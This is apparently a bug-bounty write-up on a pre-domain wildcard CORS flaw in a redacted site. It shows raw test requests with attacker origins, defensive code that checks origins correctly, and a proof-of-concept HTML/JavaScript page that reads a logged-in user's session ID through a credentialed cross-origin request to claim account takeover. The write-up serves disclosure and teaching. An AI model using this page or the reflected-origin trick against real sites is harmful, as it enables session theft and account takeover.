Pre-domain wildcard CORS Exploitation


Severity: High

Complexity: Medium

Weakness: Trusting Pre-domain Wildcard as Origin


  • Some websites make classic URL parsing mistakes when attempting to verify whether an origin should be trusted.

For example, a site which I'll call advisor.com trusts all origins that end in advisor.com, including definitelynotadvisor.com.

  • Following are the test cases tried for finding the pre-domain wildcard weakness:

I'm calling it REDACTED.COM since it is a private program on HackerOne.


Test 1:
GET /account HTTP/1.1
Host: connect.redacted.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: redacted.com
Accept-Language: en-US,en;q=0.8
Cookie:
Origin: https://redacted.com

Response:
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Accept-Encoding, Accept-Language, Authorization, X-Context, X-Session-ID
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Access-Control-Allow-Origin: https://redacted.com
Access-Control-Max-Age: 3600

Test 2:
GET /account HTTP/1.1
Host: connect.redacted.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: redacted.com
Accept-Language: en-US,en;q=0.8
Cookie:
Origin: https://evil.com

Response:
HTTP/1.1 302 Found
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Aug 2017 20:00:08 GMT
Location: https://connect.redacted.com/auth

Test 3:
GET /account HTTP/1.1
Host: connect.redacted.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: redacted.com
Accept-Language: en-US,en;q=0.8
Cookie:
Origin: https://redacted.com.evil.com

Response:
HTTP/1.1 302 Found
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Aug 2017 20:00:08 GMT
Location: https://connect.redacted.com/auth

Test 4:
GET /account HTTP/1.1
Host: connect.redacted.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: redacted.com
Accept-Language: en-US,en;q=0.8
Cookie:
Origin: https://connect.redacted.com.evil.com

Response:
HTTP/1.1 302 Found
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Aug 2017 20:00:08 GMT
Location: https://connect.redacted.com/auth

Test 5:
GET /account HTTP/1.1
Host: connect.redacted.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: redacted.com
Accept-Language: en-US,en;q=0.8
Cookie:
Origin: https://evilredacted.com

Response:
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Accept-Encoding, Accept-Language, Authorization, X-Context, X-Session-ID
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Access-Control-Allow-Origin: https://evilredacted.com
Access-Control-Max-Age: 3600
  • From Test 5 it is clear that the application is only verifying the Origin by checking whether it ends with redacted.com.
  • Access-Control-Allow-Headers (ACAH) is set and several methods are allowed as well, together with credentials. This means an attacker can make different requests on behalf of the victim.
  • To successfully exploit this we need a *redacted.com domain.
  • So I bought kiraakredacted.com to exploit it.
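The five tests above map onto a single server-side mistake: the Origin header is treated as a string and matched by suffix. The following is an added example, not code from the report or the affected application, that puts the vulnerable suffix check next to a hardened one and runs both over the exact Origin values from Tests 1 to 5. It assumes redacted.com as the placeholder trusted domain from the report, uses the WHATWG URL global available in Node.js, and the function names are mine.

```javascript
// Added example (not from the original report). Demonstrates why a
// suffix match on the raw Origin string accepts "https://evilredacted.com"
// and how a parsed, label-boundary comparison rejects it.

const TRUSTED_DOMAIN = "redacted.com"; // placeholder domain from the report

// Vulnerable check: behaves exactly like the application in Tests 1-5.
// It only asks whether the raw header value ends with the trusted domain,
// so any registrable domain whose name ends in "redacted.com" passes.
function vulnerableOriginAllowed(origin) {
  return typeof origin === "string" && origin.endsWith(TRUSTED_DOMAIN);
}

// Hardened check: parse the Origin as a URL, require a canonical origin
// (no path, query, userinfo; browsers serialize Origin in lowercase), require
// HTTPS, and compare the hostname either exactly or at a "." label boundary.
// "evilredacted.com" and "redacted.com.evil.com" are both rejected.
function hardenedOriginAllowed(origin) {
  if (typeof origin !== "string") return false;
  let url;
  try {
    url = new URL(origin);
  } catch (e) {
    return false; // not a syntactically valid origin (e.g. the literal "null")
  }
  if (url.origin !== origin) return false; // extra path/query/userinfo present
  if (url.protocol !== "https:") return false;
  const host = url.hostname;
  return host === TRUSTED_DOMAIN || host.endsWith("." + TRUSTED_DOMAIN);
}

// Response headers the server should emit. With credentials the value must
// be one specific origin (never "*"), and "Vary: Origin" stops a shared cache
// from replaying one origin's response to another. An untrusted origin gets
// no CORS headers at all, so the browser blocks the cross-origin read.
function corsHeadersFor(origin, isAllowed) {
  if (!isAllowed(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// The Origin values sent in Tests 1 to 5 of the report, in order.
const TEST_ORIGINS = [
  "https://redacted.com",
  "https://evil.com",
  "https://redacted.com.evil.com",
  "https://connect.redacted.com.evil.com",
  "https://evilredacted.com",
];

// Run both checks over a list of origins and return one row per origin.
function compare(origins = TEST_ORIGINS) {
  return origins.map((origin) => ({
    origin,
    vulnerable: vulnerableOriginAllowed(origin),
    hardened: hardenedOriginAllowed(origin),
  }));
}

for (const row of compare()) {
  console.log(row);
}
```

Run with `node` and the table shows the vulnerable check allowing Test 1 and Test 5 (the two origins that received an Access-Control-Allow-Origin header in the report) while the hardened check allows only Test 1. The same hardened function also accepts the application's own subdomain `https://connect.redacted.com` and rejects `http://redacted.com`, `https://redacted.com/path` and the literal `null` origin, which a suffix check on the raw string would not distinguish.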

  • Exploitation:

Now it's time to find a good exploitation endpoint to demonstrate and increase the impact. There was not much on connect.redacted.com to exploit; it was just a static site asking you to install their browser extension.

But one thing that kept me looking for an exploitation path was that to install that extension you need to be logged in. I suspected they were storing some information somewhere, so I started bruteforcing and reading the docs for API endpoints, and came across https://connect.redacted.com/v1/user, which contains the user's details along with the SESSIONID in the JSON response.

<html>
<body>
<button type='button' onclick='cors()'>xxx</button>
<p id='demo'></p>
<p id='session'></p>
<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // Show the raw JSON body returned for the logged-in user.
      document.getElementById("demo").innerHTML = this.responseText;
      // Parse the JSON response and collect its field values in order.
      var parsed = JSON.parse(this.responseText);
      var arr = [];
      for (var x in parsed) {
        arr.push(parsed[x]);
      }
      console.log(arr);
      // Position of the session field in this endpoint's response.
      document.getElementById('session').innerHTML = arr[13];
    }
  };
  // Credentialed cross-origin request: the browser attaches the user's
  // cookies and exposes the response because the server reflects the
  // origin with Access-Control-Allow-Credentials: true.
  xhttp.open("GET", "https://connect.redacted.com/v1/user", true);
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>
</body>
</html>
Response
  • Able to take over user accounts remotely.